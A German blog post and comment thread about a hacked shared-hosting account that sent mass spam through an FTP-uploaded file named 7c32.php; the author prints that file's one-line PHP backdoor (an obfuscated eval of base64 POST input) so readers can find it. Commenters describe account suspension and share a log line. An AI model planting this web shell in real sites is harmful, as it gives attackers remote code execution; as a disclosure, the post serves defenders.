Der Server auf dem dieses Blog läuft, hostet auch einige andere Webseiten. Eine davon wurde gehackt und hat die letzten Tage unglaubliche Mengen an Spammails versendet. Kann passieren und passiert tatsächlich auch recht oft. Nur dieses Mal war es einfach eine Datei namens 7c32.php, die per FTP hochgeladen wurde und keine Sicherheitslücke von WordPress oder was auch immer man so laufen hat. Davor eine Datei ftpchk3.php um zu prüfen, ob das FTP Verzeichnis auch per Web erreichbar ist.
Der Angreifer wusste also den Benutzernamen, das Passwort und auf welcher Domain dieses Skript laufen würde und hat das genutzt um mit der PHP Funktion mail() Spam zu verschicken. Mitgeschnitten in einem Wifi Netz? Gezielter Hack? Trojaner? Wir wissen es nicht.
Das scheint übrigens ein älterer und vermutlich automatisierter Angriff zu sein. Eine Googlesuche nach 7c32.php bringt einige viele Suchergebnisse, die zum Teil bis 2012 zurückreichen.
Wie dem auch sei … einfach mal in der eigenen Installation von was auch immer (WordPress, Joomla, Webseite mit PHP) nach einer Datei 7c32.php (im Unterverzeichnis css) suchen. Die Datei ftpchk3.php wurde vom Angreifer wieder gelöscht, laut Netz enthält sie aber auch nur den Code:
echo "OK"
Be safe!
P.S.: Der Inhalt von 7c32.php:
< ? php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ? >
Kommentare
6 Antworten zu „Über 7c32.php und Mailspam“
[…] der Mailqueue von Postfix alle Mails einer bestimmten Adresse löschen. Das kann relevant werden, wenn euer Server ein Spamzombie geworden ist und noch einige tausend Mails in der Ausgangswarteschlange liegen, die nicht zugestellt werden […]
Diese Datei habe auch ich auf meinem Webserver gefunden. Sie war dafür verantwortlich, dass massenweise Spammails über meinen Account versandt wurden. Da ich 3 Websites auf dem Webserver habe, hat der Hoster „Speicherzentrum.de“ alle 3 gesperrt. Bis heute! Finanziell bin ich so gut wie ruiniert, da ich mit 2 der 3 Websites Geld verdiene.
Die besagte Datei befand sich tatsächlich in einem Ordner, der den Titel trägt „CSS“. In den Logfiles fand sich eine IP, die aus der Nähe von Dubai stammt. Der Hoster hält sich mit Support zurück, da er mir die alleinige Verantwortung zuspricht.
Ich habe im Juli (Fund der Datei) alle Passwörter geändert (FTP-Zugang + E-Mailkonten). Nach der Löschung der Datei wurde mein Account wieder freigeschaltet. Meine Seiten konnten aber nur 48 Stunden erreicht werden, da erneut massenhaft Spammails von meinem Mailaccount verschickt wurden, obwohl die Datei gelöscht wurde!
Ich habe den gesamten Webspace auf meinen Computer geladen und einen multiplen Virenscanner eingesetzt. Dabei wurden noch 3 weitere Java-Skripte gefunden, die von mir stammten, aber scheinbar manipuliert wurden. Ich habe sie gelöscht. Ich kann nun nicht feststellen, ob die Löschung eine Auswirkung auf die Funktion meiner Seiten hat, da mein Account seit August gesperrt ist.
Die auf dem Webserver hinterlegte Log-Datei kann ich hingegen aufrufen. Dabei zeigt sich, dass die IP-Adresse aus Dubai noch immer auf die Datei „7c32.php“ zugreift, obwohl sie ja schon länger nicht mehr existiert?!
Ich bin mit der ganzen Situation völlig überfordert und kann nur hoffen, dass es vielleicht doch noch Hilfe gibt…
In den Logdateien steht ja sicher, ob die Datei gefunden wird oder nicht … die Statusnummer 2xx = gefunden, 4xx = nicht gefunden …
Wir haben es erst nach einer Woche und ca. 320000 Spammails herausgefunden. Auch deshalb liegt dieses Blog jetzt auf einem neuen Server von Hosteurope. Neue IP, neues Glück und ich muss nicht alle Blacklist Einträge löschen lassen.
Es hilft immer ein Auge auf die Mailstatistik zu haben. Wenn das nicht geht (shared hosting), dann ist das Pech. Wie soll man so auch herausfinden, dass derartiges geschieht?
Bei uns wurde das Skript allerdings per FTP hochgeladen. Keine fehlerhaften Loginversuche, d.h. dem Angreifer war der Account bekannt und auch die Domain auf der die hochgeladenen Dateien angezeigt werden würden. Da ist man dann schon „selbst schuld“. Als Resultat lassen wir keine unverschlüsselten FTP Verbindungen mehr zu …
Hallo,
ich hab mal die Zeile aus der Logdatei herauskopiert:
31.184.244.52 – – [23/Aug/2013:15:28:53 +0200] „POST /css/7c32.php HTTP/1.1“ 403 1037 „-“ „Python-urllib/2.7“
ich nehme an, Du meinst mit „4xx“ diese hier: 403. Dann wurde die Datei wohl nicht gefunden.
Das mit den verschlüsselten FTP-Verbindungen sollte ich mal den Hoster fragen. Ich weiss mir jedenfalls sonst keinen Rat mehr …
403 heißt „forbidden“ und bedeutet so viel wie, dass der Zugriff nicht erlaubt ist. Das bedeutet nicht, dass die Datei weg ist. Wahrscheinlich haben alle Logeinträge diesen Status weil dein Hoster dich gesperrt hat?
Genau! Ich sagte ja bereits, dass mein Account bis jetzt noch immer gesperrt ist. Aber, wie kann es sein, dass da jemand erneut auf die Datei zugreifen will, obwohl sie nicht mehr existiert?